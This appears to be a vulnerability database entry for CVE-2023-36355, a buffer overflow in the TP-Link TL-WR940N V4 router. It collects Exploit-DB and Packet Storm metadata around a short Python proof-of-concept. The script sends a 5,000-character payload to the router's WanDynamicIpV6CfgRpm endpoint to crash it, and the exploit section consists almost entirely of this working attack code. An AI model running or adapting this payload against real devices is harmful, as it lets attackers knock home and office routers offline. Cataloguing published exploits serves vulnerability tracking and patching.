ID

VAR-E-202307-0292


CVE

cve_id:CVE-2023-36355

Trust: 1.5

sources: PACKETSTORM: 173294 // EXPLOIT-DB: 51561

EDB ID

51561


TITLE

TP-Link TL-WR940N V4 - Buffer OverFlow - Hardware dos Exploit

Trust: 1.0

sources: EXPLOIT-DB: 51561

DESCRIPTION

TP-Link TL-WR940N V4 - Buffer OverFlow. CVE-2023-36355. DoS exploit for the hardware platform.

Trust: 1.0

sources: EXPLOIT-DB: 51561

AFFECTED PRODUCTS

vendor: tp link | model: tl-wr940n | scope: eq | version: v4

Trust: 1.0

vendor: tp link | model: tl-wr940n | scope: eq | version: 4

Trust: 0.5

sources: PACKETSTORM: 173294 // EXPLOIT-DB: 51561

EXPLOIT

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000 # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')

Trust: 1.0

sources: EXPLOIT-DB: 51561

EXPLOIT LANGUAGE

py

Trust: 1.0

sources: EXPLOIT-DB: 51561

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 51561

TYPE

Buffer OverFlow

Trust: 1.0

sources: EXPLOIT-DB: 51561

TAGS

tag:exploit

Trust: 0.5

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 173294

CREDITS

Amirhossein Bahramizadeh

Trust: 1.0

sources: EXPLOIT-DB: 51561

EXTERNAL IDS

db: NVD | id: CVE-2023-36355

Trust: 1.5

db: EXPLOIT-DB | id: 51561

Trust: 1.0

db: PACKETSTORM | id: 173294

Trust: 0.5

sources: PACKETSTORM: 173294 // EXPLOIT-DB: 51561

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2023-36355

Trust: 1.5

sources: PACKETSTORM: 173294 // EXPLOIT-DB: 51561

SOURCES

db: PACKETSTORM | id: 173294
db: EXPLOIT-DB | id: 51561

LAST UPDATE DATE

2023-12-13T13:18:36.333000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM | id: 173294 | date: 2023-07-03T22:22:22
db: EXPLOIT-DB | id: 51561 | date: 2023-07-03T00:00:00